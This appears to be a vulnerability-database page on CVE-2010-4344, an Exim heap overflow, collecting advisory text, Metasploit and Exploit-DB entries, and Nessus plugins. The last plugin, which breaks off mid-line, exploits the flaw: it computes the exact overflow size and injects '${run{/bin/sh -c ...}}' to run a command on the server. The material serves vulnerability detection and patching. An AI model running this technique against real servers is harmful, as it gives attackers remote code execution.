Vulnerabilities > CVE-2010-4344 - Out-of-bounds Write vulnerability in multiple products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Exploit-Db
description Exim4. CVE-2010-4344,CVE-2010-4345. Remote exploit for linux platform id EDB-ID:16925 last seen 2016-02-02 modified 2010-12-16 published 2010-12-16 reporter metasploit source https://www.exploit-db.com/download/16925/ title Exim4 <= 4.69 - string_format Function Heap Buffer Overflow description Exim 4.63 - Remote Root Exploit. CVE-2010-4344. Remote exploit for linux platform id EDB-ID:15725 last seen 2016-02-01 modified 2010-12-11 published 2010-12-11 reporter kingcope source https://www.exploit-db.com/download/15725/ title Exim 4.63 - Remote Root Exploit
Metasploit
description | This module exploits a heap buffer overflow within versions of Exim prior to version 4.69. By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim daemon. The root cause is that no check is made to ensure that the buffer is not full prior to handling '%s' format specifiers within the 'string_vformat' function. In order to trigger this issue, we get our message rejected by sending a message that is too large. This will call into log_write to log rejection headers (which is a default configuration setting). After filling the buffer, a long header string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL FROM' command. By sending a second message, the string we sent will be evaluated with 'expand_string' and arbitrary shell commands can be executed. It is likely that this issue could also be exploited using other techniques such as targeting in-band heap management structures, or perhaps even function pointers stored in the heap. However, these techniques would likely be far more platform specific, more complicated, and less reliable. This bug was original found and reported in December 2008, but was not properly handled as a security issue. Therefore, there was a 2 year lag time between when the issue was fixed and when it was discovered being exploited in the wild. At that point, the issue was assigned a CVE and began being addressed by downstream vendors. An additional vulnerability, CVE-2010-4345, was also used in the attack that led to the discovery of danger of this bug. This bug allows a local user to gain root privileges from the Exim user account. If the Perl interpreter is found on the remote system, this module will automatically exploit the secondary bug as well to get root. |
id | MSF:EXPLOIT/UNIX/SMTP/EXIM4_STRING_FORMAT |
last seen | 2020-01-17 |
modified | 2018-09-15 |
published | 2010-12-11 |
references |
|
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/smtp/exim4_string_format.rb |
title | Exim4 string_format Function Heap Buffer Overflow |
Nessus
NASL family Oracle Linux Local Security Checks NASL id ORACLELINUX_ELSA-2010-0970.NASL description From Red Hat Security Advisory 2010:0970 : Updated exim packages that fix one security issue are now available for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux 4.7, 5.3, and 5.4 Extended Update Support. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. Exim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. A buffer overflow flaw was discovered in Exim last seen 2020-06-01 modified 2020-06-02 plugin id 68160 published 2013-07-12 reporter This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/68160 title Oracle Linux 4 / 5 : exim (ELSA-2010-0970) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2010:0970 and # Oracle Linux Security Advisory ELSA-2010-0970 respectively. # include("compat.inc"); if (description) { script_id(68160); script_version("1.10"); script_cvs_date("Date: 2019/10/25 13:36:09"); script_cve_id("CVE-2010-4344"); script_bugtraq_id(45308); script_xref(name:"RHSA", value:"2010:0970"); script_name(english:"Oracle Linux 4 / 5 : exim (ELSA-2010-0970)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Oracle Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "From Red Hat Security Advisory 2010:0970 : Updated exim packages that fix one security issue are now available for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux 4.7, 5.3, and 5.4 Extended Update Support. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. Exim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. A buffer overflow flaw was discovered in Exim's internal string_vformat() function. A remote attacker could use this flaw to execute arbitrary code on the mail server running Exim. (CVE-2010-4344) Note: successful exploitation would allow a remote attacker to execute arbitrary code as root on a Red Hat Enterprise Linux 4 or 5 system that is running the Exim mail server. An exploit for this issue is known to exist. For additional information regarding this flaw, along with mitigation advice, please see the Knowledge Base article linked to in the References section of this advisory. Users of Exim are advised to update to these erratum packages which contain a backported patch to correct this issue. After installing this update, the Exim daemon will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2010-December/001767.html" ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2010-December/001768.html" ); script_set_attribute(attribute:"solution", value:"Update the affected exim packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Exim4 string_format Function Heap Buffer Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:exim"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:exim-doc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:exim-mon"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:exim-sa"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:4"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:5"); script_set_attribute(attribute:"vuln_publication_date", value:"2010/12/14"); script_set_attribute(attribute:"patch_publication_date", value:"2010/12/11"); script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/12"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Oracle Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux"); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux"); os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux"); os_ver = os_ver[1]; if (! preg(pattern:"^(4|5)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 4 / 5", "Oracle Linux " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && "ia64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu); flag = 0; if (rpm_check(release:"EL4", reference:"exim-4.43-1.RHEL4.5.el4_8.1")) flag++; if (rpm_check(release:"EL4", reference:"exim-doc-4.43-1.RHEL4.5.el4_8.1")) flag++; if (rpm_check(release:"EL4", reference:"exim-mon-4.43-1.RHEL4.5.el4_8.1")) flag++; if (rpm_check(release:"EL4", reference:"exim-sa-4.43-1.RHEL4.5.el4_8.1")) flag++; if (rpm_check(release:"EL5", reference:"exim-4.63-5.el5_5.2")) flag++; if (rpm_check(release:"EL5", reference:"exim-mon-4.63-5.el5_5.2")) flag++; if (rpm_check(release:"EL5", reference:"exim-sa-4.63-5.el5_5.2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "exim / exim-doc / exim-mon / exim-sa"); }
NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2010-0970.NASL description Updated exim packages that fix one security issue are now available for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux 4.7, 5.3, and 5.4 Extended Update Support. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. Exim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. A buffer overflow flaw was discovered in Exim last seen 2020-06-01 modified 2020-06-02 plugin id 51133 published 2010-12-12 reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/51133 title RHEL 4 / 5 : exim (RHSA-2010:0970) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2010:0970. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(51133); script_version ("1.26"); script_cvs_date("Date: 2019/10/25 13:36:15"); script_cve_id("CVE-2010-4344"); script_bugtraq_id(45308); script_xref(name:"RHSA", value:"2010:0970"); script_name(english:"RHEL 4 / 5 : exim (RHSA-2010:0970)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Updated exim packages that fix one security issue are now available for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux 4.7, 5.3, and 5.4 Extended Update Support. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. Exim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. A buffer overflow flaw was discovered in Exim's internal string_vformat() function. A remote attacker could use this flaw to execute arbitrary code on the mail server running Exim. (CVE-2010-4344) Note: successful exploitation would allow a remote attacker to execute arbitrary code as root on a Red Hat Enterprise Linux 4 or 5 system that is running the Exim mail server. An exploit for this issue is known to exist. For additional information regarding this flaw, along with mitigation advice, please see the Knowledge Base article linked to in the References section of this advisory. Users of Exim are advised to update to these erratum packages which contain a backported patch to correct this issue. After installing this update, the Exim daemon will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2010-4344" ); # https://access.redhat.com/kb/docs/DOC-43789 script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/articles/43788" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2010:0970" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Exim4 string_format Function Heap Buffer Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:exim"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:exim-doc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:exim-mon"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:exim-sa"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4.7"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4.8"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.3"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.4"); script_set_attribute(attribute:"vuln_publication_date", value:"2010/12/14"); script_set_attribute(attribute:"patch_publication_date", value:"2010/12/10"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/12/12"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! preg(pattern:"^(4|5)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 4.x / 5.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2010:0970"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { sp = get_kb_item("Host/RedHat/minor_release"); if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); flag = 0; if (sp == "7") { if (rpm_check(release:"RHEL4", sp:"7", reference:"exim-4.43-1.RHEL4.5.el4_7.1")) flag++; } else { if (rpm_check(release:"RHEL4", reference:"exim-4.43-1.RHEL4.5.el4_8.1")) flag++; } if (sp == "7") { if (rpm_check(release:"RHEL4", sp:"7", reference:"exim-doc-4.43-1.RHEL4.5.el4_7.1")) flag++; } else { if (rpm_check(release:"RHEL4", reference:"exim-doc-4.43-1.RHEL4.5.el4_8.1")) flag++; } if (sp == "7") { if (rpm_check(release:"RHEL4", sp:"7", reference:"exim-mon-4.43-1.RHEL4.5.el4_7.1")) flag++; } else { if (rpm_check(release:"RHEL4", reference:"exim-mon-4.43-1.RHEL4.5.el4_8.1")) flag++; } if (sp == "7") { if (rpm_check(release:"RHEL4", sp:"7", reference:"exim-sa-4.43-1.RHEL4.5.el4_7.1")) flag++; } else { if (rpm_check(release:"RHEL4", reference:"exim-sa-4.43-1.RHEL4.5.el4_8.1")) flag++; } if (sp == "4") { if (rpm_check(release:"RHEL5", sp:"4", cpu:"i386", reference:"exim-4.63-3.el5_4.1")) flag++; } else if (sp == "3") { if (rpm_check(release:"RHEL5", sp:"3", cpu:"i386", reference:"exim-4.63-3.el5_3.1")) flag++; } else { if (rpm_check(release:"RHEL5", cpu:"i386", reference:"exim-4.63-5.el5_5.2")) flag++; } if (sp == "4") { if (rpm_check(release:"RHEL5", sp:"4", cpu:"s390x", reference:"exim-4.63-3.el5_4.1")) flag++; } else if (sp == "3") { if (rpm_check(release:"RHEL5", sp:"3", cpu:"s390x", reference:"exim-4.63-3.el5_3.1")) flag++; } else { if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"exim-4.63-5.el5_5.2")) flag++; } if (sp == "4") { if (rpm_check(release:"RHEL5", sp:"4", cpu:"x86_64", reference:"exim-4.63-3.el5_4.1")) flag++; } else if (sp == "3") { if (rpm_check(release:"RHEL5", sp:"3", cpu:"x86_64", reference:"exim-4.63-3.el5_3.1")) flag++; } else { if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"exim-4.63-5.el5_5.2")) flag++; } if (sp == "4") { if (rpm_check(release:"RHEL5", sp:"4", cpu:"i386", reference:"exim-mon-4.63-3.el5_4.1")) flag++; } else if (sp == "3") { if (rpm_check(release:"RHEL5", sp:"3", cpu:"i386", reference:"exim-mon-4.63-3.el5_3.1")) flag++; } else { if (rpm_check(release:"RHEL5", cpu:"i386", reference:"exim-mon-4.63-5.el5_5.2")) flag++; } if (sp == "4") { if (rpm_check(release:"RHEL5", sp:"4", cpu:"s390x", reference:"exim-mon-4.63-3.el5_4.1")) flag++; } else if (sp == "3") { if (rpm_check(release:"RHEL5", sp:"3", cpu:"s390x", reference:"exim-mon-4.63-3.el5_3.1")) flag++; } else { if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"exim-mon-4.63-5.el5_5.2")) flag++; } if (sp == "4") { if (rpm_check(release:"RHEL5", sp:"4", cpu:"x86_64", reference:"exim-mon-4.63-3.el5_4.1")) flag++; } else if (sp == "3") { if (rpm_check(release:"RHEL5", sp:"3", cpu:"x86_64", reference:"exim-mon-4.63-3.el5_3.1")) flag++; } else { if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"exim-mon-4.63-5.el5_5.2")) flag++; } if (sp == "4") { if (rpm_check(release:"RHEL5", sp:"4", cpu:"i386", reference:"exim-sa-4.63-3.el5_4.1")) flag++; } else if (sp == "3") { if (rpm_check(release:"RHEL5", sp:"3", cpu:"i386", reference:"exim-sa-4.63-3.el5_3.1")) flag++; } else { if (rpm_check(release:"RHEL5", cpu:"i386", reference:"exim-sa-4.63-5.el5_5.2")) flag++; } if (sp == "4") { if (rpm_check(release:"RHEL5", sp:"4", cpu:"s390x", reference:"exim-sa-4.63-3.el5_4.1")) flag++; } else if (sp == "3") { if (rpm_check(release:"RHEL5", sp:"3", cpu:"s390x", reference:"exim-sa-4.63-3.el5_3.1")) flag++; } else { if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"exim-sa-4.63-5.el5_5.2")) flag++; } if (sp == "4") { if (rpm_check(release:"RHEL5", sp:"4", cpu:"x86_64", reference:"exim-sa-4.63-3.el5_4.1")) flag++; } else if (sp == "3") { if (rpm_check(release:"RHEL5", sp:"3", cpu:"x86_64", reference:"exim-sa-4.63-3.el5_3.1")) flag++; } else { if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"exim-sa-4.63-5.el5_5.2")) flag++; } if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "exim / exim-doc / exim-mon / exim-sa"); } }
NASL family SMTP problems NASL id EXIM_STRING_VFORMAT.NASL description A heap overflow vulnerability exists in the version of exim installed on the remote host. By sending a specially crafted message to the server, a remote attacker can leverage this vulnerability to execute arbitrary code on the server with the privilege of the exim server. A separate vulnerability that Nessus didn last seen 2020-06-01 modified 2020-06-02 plugin id 51179 published 2010-12-15 reporter This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/51179 title Exim string_format Function Remote Overflow code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(51179); script_version("1.17"); script_cvs_date("Date: 2018/11/15 20:50:24"); script_cve_id("CVE-2010-4344"); script_bugtraq_id(45308); script_name(english:"Exim string_format Function Remote Overflow"); script_summary(english:"Tries to run a command."); script_set_attribute( attribute:"synopsis", value:"The remote service has a buffer overflow." ); script_set_attribute( attribute:"description", value: "A heap overflow vulnerability exists in the version of exim installed on the remote host. By sending a specially crafted message to the server, a remote attacker can leverage this vulnerability to execute arbitrary code on the server with the privilege of the exim server. A separate vulnerability that Nessus didn't test for, CVE-2010-4345, is often used to elevate the exim user to root access. Note that Nessus checked for this vulnerability by sending a specially crafted packet and checking the response, without crashing the service. All 4.6x versions 4.69-9 and below are known to be affected, and others may be as well." ); script_set_attribute( attribute:"solution", value:"Upgrade to version 4.70 as it addresses the issue." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Exim4 string_format Function Heap Buffer Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"see_also", value:"https://bugs.exim.org/show_bug.cgi?id=787" ); script_set_attribute(attribute:"see_also", value:"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=606612" ); script_set_attribute(attribute:"see_also", value:"https://lists.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html" ); script_set_attribute(attribute:"vuln_publication_date", value:"2010/12/10"); script_set_attribute(attribute:"patch_publication_date", value:"2008/12/08"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/12/15"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:exim:exim"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"SMTP problems"); script_copyright(english:"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencie("smtpserver_detect.nasl"); script_require_ports("Services/smtp", 25); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("smtp_func.inc"); include("data_protection.inc"); # Get the SMTP port port = get_service(svc:"smtp", default:25, exit_on_fail:TRUE); if (!get_port_state(port)) exit(0, "Port "+port+" is not open."); # Get the banner from the registry (so we can bail early if it isn't a vulnerable version) banner = get_smtp_banner(port:port); if (!banner) exit(1, "The mail server listening on port "+port+" didn't respond."); if ("Exim" >!< banner) exit(1, "The mail server listening on port "+port+" does not appear to be Exim."); # Make sure the version of exim is 4.6x - other versions aren't vulnerable banner = eregmatch(pattern:"^220 .*(Exim [0-9]+\.[0-9]+)", string:banner); if (!banner) exit(1, "The Exim install listening on port "+port+" returned an unexpected response to EHLO."); if ('4.6' >!< banner[1]) exit(1, "The Exim install listening on port "+port+" doesn't look like a vulnerable version."); # Set up some variables from = smtp_from_header(); to = get_kb_item("SMTP/headers/To"); if (!to) to = 'root@localhost'; # The user@ portion of the from/to headers (required for length checking) from_user = eregmatch(pattern:"^(.*)@(.*)$", string:from); from_user = from_user[1]; to_user = eregmatch(pattern:"^(.*)@(.*)$", string:from); to_user = to_user[1]; if (!from_user) exit(1, "'from' email address was in an invalid format: " + from); if(!to_user) exit(1, "'to' email address was in an invalid format: " + from); # Hostname and ip should be filled in after the EHLO hostname = 'nessus'; ip = "xxx.xxx.x.xxx"; # Initialize the overflow size to 50mb (this should be filled in later) max_size = 50 * 1024 * 1024; # The command to run when we get access, and how to match it command = 'id'; command_match = 'uid='; # Open the socket socket = open_sock_tcp(port); if (!socket) exit(1, "Can't open socket on port "+port+"."); # Receive the first line header = recv_line( socket:socket, length:1024); if(!header) exit(1, "The Exim install listening on port "+port+" didn't respond."); # Send the EHLO request = 'EHLO ' + hostname + '\r\n'; send(socket:socket, data:request); # Parse the options (we're interested in SIZE, which tells us how big we have to go to generate an error) while(TRUE) { # Get the next options line options = recv_line( socket:socket, length:1024); # Parse it to make sure it's not an error options = eregmatch(pattern:"^250([ -])(.*)", string:options); if(!options) exit(0, "Server on port "+port+" returned an unexpected result"); # In the 'hello' response, parse out the hostname/ip address # 250-debian Hello domain.com [192.168.103.1] if("Hello" >< options[2]) { options = eregmatch(pattern:"Hello ([^ ]+) \[([0-9.]+)\]", string:options[2]); if(!options) exit(1, "Server returned an unexected 'Hello' string"); hostname = options[1]; ip = options[2]; } # Parse the 'size' - this tells us how much we need to overflow the buffer # 250-SIZE 52428800 if("SIZE" >< options[2]) { new_size = eregmatch(pattern:'SIZE ([0-9]*)', string:options[2]); if(new_size) max_size = int(new_size[1]); } # Check if we're at the end of the options array if(options[1] == ' ') break; } # Send the MAIL FROM and check for errors request = 'MAIL FROM: ' + from + '\r\n'; send(socket:socket, data:request); response = recv_line( socket:socket, length:1024); if('250' >!< response) exit(1, "The Exim install listening on port "+port+" returned an unexpected result to MAIL FROM (" + response + ")."); # Send the RCPT TO (also using Metasploit's default) request = 'RCPT TO: ' + to + '\r\n'; send(socket:socket, data:request); response = recv_line( socket:socket, length:1024); if('250' >!< response) exit(1, "The Exim install listening on port "+port+" returned an unexpected result to RCPT TO (" + response + ")."); # Send the DATA request = 'DATA\r\n'; send(socket:socket, data:request); response = recv_line( socket:socket, length:1024); if('354' >!< response) exit(1, "The Exim install listening on port "+port+" returned an unexpected result to DATA (" + response + ")."); # Finally, we have to overflow the buffer exactly right, so there are 3 bytes left. The # exploit is in a sprintf()-style function called string_vformat(). If the length string # passed to string_vformat() is exactly the same as the number of characters in the string, # the overflow happens. That's normally difficult to accomplish, but Exim's logging for failed # connection gives exactly that opportunity. # # The buffer starts at 8192 bytes. Each line it prints shortens the buffer by that much. buffer_size = 8192; # The date is prefixed to the log buffer_size = buffer_size - strlen("2010-12-13 15:46:12 "); # As is the message ID buffer_size = buffer_size - strlen("1PSF66-0000nX-9z "); # Different configurations use a different string here.. this is what the default on Slackware is: #rejected from <root@localhost> U=root: message too big: read=56725188 max=52428800 # # And on Debian (the one we're checking for): #rejected from <root@localhost> H=(hostname) [192.168.103.1]: message too big: read=56725188 max=52428800 # # Unfortunately, we can't check them all, so we're going to use Debian's default buffer_size = buffer_size - strlen("rejected from <" + from + "> H=(" + hostname + ") [" + ip + "]: message too big: read=" + max_size + " max=" + max_size + "\n"); # string_format: 'Envelope-from: <%s>\n' => Envelope-from: <root@localhost>\n buffer_size = buffer_size - strlen('Envelope-from: <' + from + '>\n'); # string_format: 'Envelope-to: <%s>\n' => Envelope-to: <postmaster@localhost>\n buffer_size = buffer_size - strlen('Envelope-to: <' + to + '>\n'); # At this point, the buffer should be approximately 8000 bytes long. We need to use up all but three. # Build the buffer for 'data' that will use it all up data_buffer = ''; chunk = crap(12) + ': ' + crap(100) + '\n'; # We want 3 bytes left in the buffer at the end, so substract them now (that way, we can work with 0 as a target) buffer_size = buffer_size - 4; # This loop is a little tricky, and was by far the hardest part (for me, at least). Basically, we have approximately # 8000 bytes to use up. But we have to be exact to trigger the vulnerability. Each time we add a line to the array, # it uses up 2 extra bytes (string_vformat is called with "%c %s", and winds up with two spaces at the start - I'm # not sure what the '%c' means in thnis case). # # To make sure we don't wind up with under 3 bytes, we stop when there's between #chunk and # #chunk * 2 bytes left and add the last two lines. That means that, at a minimum, both lines # will be #chunk/2 bytes long. while(buffer_size >= strlen(chunk) * 2) { to_add = ''; data_buffer = data_buffer + chunk; buffer_size = buffer_size - strlen(chunk) - 2; } # The two pairs of extra bytes buffer_size = buffer_size - 4; # The new newlines buffer_size = buffer_size - 2; # The length of the two strings without newlines s1 = buffer_size / 2; s2 = buffer_size - s1; # Finally, add them, which will create the string that exactly overflows the buffer data_buffer = data_buffer + substr(chunk, 0, s1) + '\n'; data_buffer = data_buffer + substr(chunk, 0, s2) + '\n'; # Add the command that'll overflow the ACL data_buffer = data_buffer + crap(7) + ": "; for(i = 0; i < 100; i++) for(j = 3; j < 12; j++) data_buffer = data_buffer + "${run{/bin/sh -c '" + command + ">&" + j + "'}} "; data_buffer = data_buffer + '\n'; # Send it all send(socket:socket, data:data_buffer); # Next, send a really really really long string. The purpose of this is the cause the mail server # to return an error ("message too long"). We do this in a loop so we don't have to allocate 50mb # of buffer space and annoy the memory manager. for(i = 0; i < 10; i++) send(socket:socket, data:crap(data:crap(255) + '\n', length: max_size/10)); # Terminate the email send(socket:socket, 